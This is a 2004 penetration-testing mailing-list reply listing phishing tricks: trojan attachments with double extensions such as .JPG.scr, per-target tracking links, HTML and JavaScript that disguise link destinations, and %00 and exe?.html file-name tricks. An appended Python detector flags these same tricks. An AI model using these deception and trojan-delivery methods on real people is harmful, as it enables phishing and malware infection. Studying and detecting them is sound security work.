Re: Social Engineering Website (URL obfuscation/hiding)
From: Martin Mačok (martin.macok_at_underground.cz)
Date: 01/10/04
- Previous message: Jerry Shenk: "Converting raw 802.11 (rfmon) capture file to standard libpcap"
- In reply to: Random Task: "Social Engineering Website"
- Next in thread: Otero, Hernan (EDS): "RE: Social Engineering Website"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Sat, 10 Jan 2004 08:59:16 +0100
To: pen-test@securityfocus.com
On Fri, Jan 09, 2004 at 06:32:48AM -0800, Random Task wrote:
> As a last note, we'd need to get people to go there. Making it look
> legit would be good. (i.e. use the %00 IE exploit to make the URL
> look like it's internal and make the site look like their own) Any
> techniques or message styles you've used and had success with?
- send the trojan code in an email attachment with a good old
something.JPG.scr trick (if you can go to them, they don't have to
go to you)
- some content filters disallow .scr, so try .lnk also
- send a link to the trojan file; in a typical MS Outlook environment,
they just have to click on it and select "Open"
- use a unique URL/file for each target (so you can track downloads
and email forwards)
URL obfuscation/hiding:
<script language="JavaScript">
<!--
function changehref()
{
    document.all("obj").href = "http://www.fakesite.com";
    return 1;
}
//-->
</script>
[snip]
<a href="http://www.realsite.com/" id="obj"
   onclick="changehref();">www.fakesite.com</a>
Similar trick:
<a href="http://www.realsite.com"
   onmouseover="window.status=('http://www.fakesite.com/'); return true;">www.fakesite.com</a>
A more recent scam trick:
<a
href="http://www.fakesite.com:something_ugly_long@www.realsite.com/">
www.fakesite.com</a>
Another MS IE trick (the browser believes it's HTML instead of an EXE):
http://server/file.exe?.html
As you mention, MS IE's (and possibly some other browsers') %00 trick:
README.TXT%00PROG.EXE in Content-disposition:
(there are many different tricks with %00)
See also:
http://www.infohacking.com/INFOHACKING_RESEARCH/Our_Advisories/IE/index.html
http://www.solutions.fi/iebug2
--
Martin Mačok http://underground.cz/
martin.ma***@underground.cz http://Xtrmntr.org/ORBman/
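A defender-side check for the link and file-name tricks listed in the message above, as an added example that is not part of the original post: it parses message HTML and flags links whose visible text names a different host than the href, userinfo-style URLs, script handlers on links, and suspicious file names. The names `audit`, `check_name`, `LinkAudit`, the flag strings and the extension lists are assumptions chosen for this illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

HOSTLIKE = re.compile(r"\s*(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)
NAME_RULES = [  # constructed rule set; the extension lists are assumptions
    ("nul-in-name", re.compile(r"%00|\x00")),
    ("double-extension", re.compile(r"\.(jpe?g|gif|txt|html?)\.(scr|lnk|exe|pif)$", re.I)),
    ("exe-path-benign-query", re.compile(r"\.(exe|scr|pif)\?.*\.(html?|txt|jpe?g)$", re.I)),
]
# Link markup quoted in the message above, used as sample input.
SAMPLE = '<a href="http://www.fakesite.com:something_ugly_long@www.realsite.com/">www.fakesite.com</a>'

def check_name(name):
    """Flags for an attachment name, Content-Disposition filename or URL."""
    return [flag for flag, rule in NAME_RULES if rule.search(name)]

class LinkAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.links, self._cur = [], None  # links: (href, flags) per <a>

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        href = dict(attrs).get("href") or ""
        url, flags = urlsplit(href), check_name(href)
        if url.username is not None:  # scheme://shown-host:junk@actual-host/
            flags.append("userinfo-in-url")
        flags += ["handler:" + k for k, _ in attrs if k.startswith("on")]
        self._cur = [href, (url.hostname or "").lower(), "", flags]

    def handle_data(self, data):
        if self._cur:
            self._cur[2] += data  # accumulate the visible link text

    def handle_endtag(self, tag):
        if tag == "a" and self._cur:
            href, host, text, flags = self._cur
            shown = HOSTLIKE.match(text)  # does the link text read as a host name?
            if shown and shown.group(1).lower() != host:
                flags.append("text-host-mismatch")
            self.links.append((href, flags))
            self._cur = None

def audit(html):
    parser = LinkAudit()
    parser.feed(html)
    parser.close()
    return [link for link in parser.links if link[1]]  # only flagged links
```

The host comparison is exact, so a deployment would normally compare registrable domains instead to avoid flagging `example.org` against `www.example.org`.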